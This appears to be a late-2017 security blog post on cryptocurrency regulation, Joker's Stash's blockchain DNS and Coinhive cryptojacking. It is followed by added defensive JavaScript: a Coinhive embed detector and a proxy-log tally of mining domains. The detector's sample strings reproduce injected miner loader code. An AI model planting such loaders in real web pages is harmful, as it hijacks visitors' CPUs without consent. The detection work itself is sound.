Malicious Trends: JavaScript Cryptojacking on Steroids Wins the Cycle Race


In this article, we look at recent developments in cryptocurrency, both from a regulatory perspective and in terms of its adoption by cybercrime.

Cryptocurrency is hot. According to coinmarketcap.com, there are now over 1300 cryptocurrencies with new initial coin offerings (ICOs) accelerating all the time. We are seeing the beginning of regulatory acceptance as the British territory Gibraltar’s Financial Services Commission offers a new regulatory framework for Distributed Ledger Technology (DLT). The new framework will become operational as of January 2018 and will regulate the activities of firms operating in or from Gibraltar that use DLT to store or transmit value belonging to others, such as virtual currency exchanges.

Distributed Ledger Technology

A discussion paper released by the British government describes a distributed ledger as essentially an asset database that can be shared across a network of multiple sites, geographies or institutions. All participants within a network can have their own identical copy of the ledger, and any changes to the ledger are reflected in all copies in minutes, or in some cases seconds. The assets can be financial, legal, physical or electronic. The security and accuracy of the assets stored in the ledger are maintained cryptographically, through the use of keys and signatures that control who can do what within the shared ledger. Entries can also be updated by one, some or all of the participants, according to rules adopted by the network. Blockchain, the distributed ledger technology underlying Bitcoin, is the best known. More on DLT is available from the UK Government Chief Scientific Adviser.

Currently, the price trajectory of Bitcoin is higher than a North Korean rocket, and Blockchain is saving the world, one application at a time. It will be interesting to see how increased regulation impacts the value of Bitcoin and its rivals.

Cybercrime, which quickly adopted cryptocurrency as the payment method for the ransomware plague, is now turning its eye to other uses for cryptocurrency technology. Firstly, we are seeing stolen account and credit card shops use blockchain-based peer-to-peer DNS as a technique for bulletproofing their offerings. Joker's Stash (see Figure A), which has been linked to the Sonic Drive-In breach, is using the .bazar top-level domain as an alternative to traditional DNS and Tor-based naming. Secondly, the bandwagon for placing JavaScript that runs a coin-mining function on vulnerable websites and in referred adverts, #minevertising, has started to gallop away.

Figure A: Joker's Stash website offering stolen account details uses a .bazar domain, as shown in the URL at the top of this screenshot.

Cryptojacking

We are seeing a few adverts (see Figure B) on the dark markets offering to inject Monero JavaScript coin miners tagged with the criminal's unique site key. Anyone who visits a compromised website then has their browser run the miner for as long as the page stays open, consuming up to 100% of the CPU to mine Monero on the criminal's behalf. This activity has been named #cryptojacking.


Figure B: Online advert offering Monero mining malware.

A stream of high-profile sites has fallen victim to injection of mining JavaScript from coinhive.com. CBS's showtime.com and cristianoronaldo.com (see Figure C) are probably the two most notable cases to date.
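The injection described above and the Coinhive loader seen on the compromised sites can be picked out of a page's HTML with a few patterns. The following is an added example, not code from the article or from Coinhive: it matches the publicly documented late-2017 Coinhive embed (the coinhive.min.js loader plus a `new CoinHive.Anonymous('SITE_KEY', {throttle: ...})` call), recovers the site key that routes the mined Monero to the criminal, and turns the throttle option into the rough share of the visitor's CPU the miner will take. The sample pages and the site key are constructed for this example and are not real.

```javascript
// Added example (not the article's or Coinhive's code): detect the Coinhive embed
// that the injection adverts sell, and recover the site key behind it.
// Matches the publicly documented late-2017 embed:
//   <script src="https://coinhive.com/lib/coinhive.min.js"></script>
//   <script>var miner = new CoinHive.Anonymous('SITE_KEY', {throttle: 0.3}); miner.start();</script>
// Everything in the SAMPLE_* strings is constructed; the 32-character site key is not real.

const LOADER_RE = /<script[^>]*\ssrc=["']?(?:https?:)?\/\/coinhive\.com\/lib\/[^"'\s>]+/i;
const MINER_RE = /new\s+CoinHive\.(Anonymous|User)\s*\(\s*['"]([A-Za-z0-9]{32})['"]/;
const THROTTLE_RE = /throttle\s*:\s*([0-9]*\.?[0-9]+)/;

// Returns null for a clean page, otherwise what a responder needs to record:
// whether the loader <script> is in the markup, which API was called, the site key,
// and the throttle (Coinhive's fraction of idle time; 0 or absent means full CPU).
function findCoinhive(html) {
  const loader = LOADER_RE.test(html);
  const m = MINER_RE.exec(html);
  if (!loader && !m) return null;
  const result = { loader, api: null, siteKey: null, throttle: 0 };
  if (m) {
    result.api = m[1];
    result.siteKey = m[2];
    // The options object follows the key inside the same call; look a short way ahead.
    const t = THROTTLE_RE.exec(html.slice(m.index, m.index + 400));
    if (t) result.throttle = parseFloat(t[1]);
  }
  return result;
}

// Approximate share of the visitor's CPU the miner takes, as an integer percent.
function cpuSharePercent(result) {
  return Math.round((1 - result.throttle) * 100);
}

// Constructed clean page: a normal third-party script, no miner.
const SAMPLE_CLEAN =
  '<html><head><script src="https://cdn.example/jquery.min.js"></script></head><body>hi</body></html>';

// Constructed injected page: loader tag plus miner call with a 30% throttle.
const SAMPLE_INJECTED = [
  '<html><head><title>Fan site</title>',
  '<script src="https://coinhive.com/lib/coinhive.min.js"></script>',
  '</head><body>',
  '<script>',
  "var miner = new CoinHive.Anonymous('A1b2C3d4E5f6G7h8I9j0K1l2M3n4O5p6', {throttle: 0.3});",
  'miner.start();',
  '</script></body></html>',
].join('\n');

// Constructed variant: loader added at runtime via createElement, so only the
// miner call is visible in the markup, and no throttle means the full CPU.
const SAMPLE_INLINE_ONLY =
  "<script>var s=document.createElement('script');s.src='https://coinhive.com/lib/coinhive.min.js';" +
  "document.head.appendChild(s);var m=new CoinHive.Anonymous('A1b2C3d4E5f6G7h8I9j0K1l2M3n4O5p6');m.start();</script>";

// Example run: report each sample the way a scanner would.
for (const [name, html] of [['clean', SAMPLE_CLEAN], ['injected', SAMPLE_INJECTED], ['inline-only', SAMPLE_INLINE_ONLY]]) {
  const r = findCoinhive(html);
  console.log(name, r ? `site key ${r.siteKey}, ~${cpuSharePercent(r)}% CPU` : 'no miner found');
}
```

Run it with `node` and each sample is classified. Plain regexes only catch the documented embed; an attacker who packs or obfuscates the loader defeats them, and the durable signal on a busy site is the outbound fetch of the loader domain in proxy logs, combined with CPU telemetry from endpoints.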

Figure C: cristianoronaldo.com is one of the websites that was found to be compromised with cryptojacking malware.

When we look at the trend in the domains referred to by cryptojacking JavaScript, we see a 700% increase from August to November in exploits that carry a cryptojacking payload. Figure D shows the increase and the most popular mining domains.
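The kind of per-month tally that sits behind a trend figure like Figure D, as an added example and not the article's data or tooling: it reads proxy log lines, counts fetches of known miner loaders by month, by mining domain and by referring site (the referer is the page that carried the injection, so it is the list of likely compromised sites), and computes the increase between two months. The two mining domains are the ones the article names; the log format, hostnames, dates and counts are all constructed for this example.

```javascript
// Added example (not the article's code or data): tally cryptojacking loader
// fetches in web-proxy logs by month, mining domain and referring site.
// The mining domains are the two the article names; every log line is constructed.

const MINING_DOMAINS = new Set(['coinhive.com', 'poolminexmr.com']);

// Constructed log lines: "<ISO timestamp> <client ip> <requested url> <referer>"
const SAMPLE_LOG = [
  '2017-08-03T09:12:44Z 10.1.1.20 https://poolminexmr.com/miner.js https://shop.example/',
  '2017-08-17T14:02:10Z 10.1.1.21 https://cdn.example/jquery.min.js https://shop.example/',
  '2017-09-22T11:40:03Z 10.1.1.22 https://coinhive.com/lib/coinhive.min.js https://fansite.example/',
  '2017-10-05T08:15:51Z 10.1.1.23 https://coinhive.com/lib/coinhive.min.js https://fansite.example/',
  '2017-11-01T19:33:27Z 10.1.1.24 https://coinhive.com/lib/coinhive.min.js https://video.example/',
  '2017-11-09T07:58:12Z 10.1.1.25 https://coinhive.com/lib/coinhive.min.js https://fansite.example/',
  '2017-11-09T07:58:13Z 10.1.1.25 https://coinhive.com/lib/coinhive.min.js https://fansite.example/',
  '2017-11-21T22:10:45Z 10.1.1.26 https://poolminexmr.com/miner.js https://forum.example/',
  '2017-11-28T03:04:09Z 10.1.1.27 https://coinhive.com/lib/coinhive.min.js -',
];

// Hostname of a URL, or null for "-" and anything unparseable.
function hostOf(u) {
  try { return new URL(u).hostname; } catch (e) { return null; }
}

// One log line -> {month, client, host, referer}, or null when the line is malformed.
function parseLine(line) {
  const parts = line.trim().split(/\s+/);
  if (parts.length < 3) return null;
  const [ts, client, url, referer] = parts;
  const host = hostOf(url);
  if (!host) return null;
  return { month: ts.slice(0, 7), client, host, referer: referer ? hostOf(referer) : null };
}

// Count miner-loader fetches three ways; non-mining traffic is ignored.
function tallyMiners(lines) {
  const byMonth = {};    // month -> fetches of any mining domain
  const byDomain = {};   // mining domain -> fetches
  const byReferer = {};  // referring site -> fetches (the likely compromised sites)
  for (const line of lines) {
    const rec = parseLine(line);
    if (!rec || !MINING_DOMAINS.has(rec.host)) continue;
    byMonth[rec.month] = (byMonth[rec.month] || 0) + 1;
    byDomain[rec.host] = (byDomain[rec.host] || 0) + 1;
    if (rec.referer) byReferer[rec.referer] = (byReferer[rec.referer] || 0) + 1;
  }
  return { byMonth, byDomain, byReferer };
}

// Percentage change between two months, or null when the baseline month had nothing
// (a silent baseline would otherwise read as an infinite increase).
function percentIncrease(tally, fromMonth, toMonth) {
  const a = tally.byMonth[fromMonth] || 0;
  const b = tally.byMonth[toMonth] || 0;
  if (a === 0) return null;
  return Math.round(((b - a) / a) * 100);
}

// Referring sites ranked by miner fetches: the first places to notify or block.
function topReferers(tally, n) {
  return Object.entries(tally.byReferer).sort((x, y) => y[1] - x[1]).slice(0, n);
}

// Example run over the constructed log.
const tally = tallyMiners(SAMPLE_LOG);
console.log('by month', tally.byMonth);
console.log('by mining domain', tally.byDomain);
console.log('top referring sites', topReferers(tally, 3));
console.log('Aug -> Nov increase', percentIncrease(tally, '2017-08', '2017-11'), '%');
```

The byDomain view is what ranks coinhive.com against poolminexmr.com as in Figure D; the byReferer view is the one a responder acts on, since each referring host is a site that is serving the miner to its visitors.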

Figure D: Coinhive.com has replaced poolminexmr.com as the most popular mining domain.

Cryptojacking payloads look set to become a mainstream attack in 2018. We may even see this method of monetisation, which requires nothing of the victim beyond visiting a page, take over from current ransomware options that require victims to actively make the ransom payment.

Andy Norton


Andy has been involved in cyber security best practice for over 20 years, specialising in establishing emerging security technologies at Symantec, Cisco and FireEye. In that time, he has presented threat and intelligence briefings for both the Bush and Obama administrations, the Cabinet Office, the Foreign and Commonwealth Office, SWIFT, the Swiss National Bank, the Prudential Regulation Authority, the Bank of England, the Hong Kong Monetary Authority and NASA. Returning to Europe from Asia in 2011, he has spent the past five years helping many of the FTSE 250 companies measure, manage and respond to cyber incidents.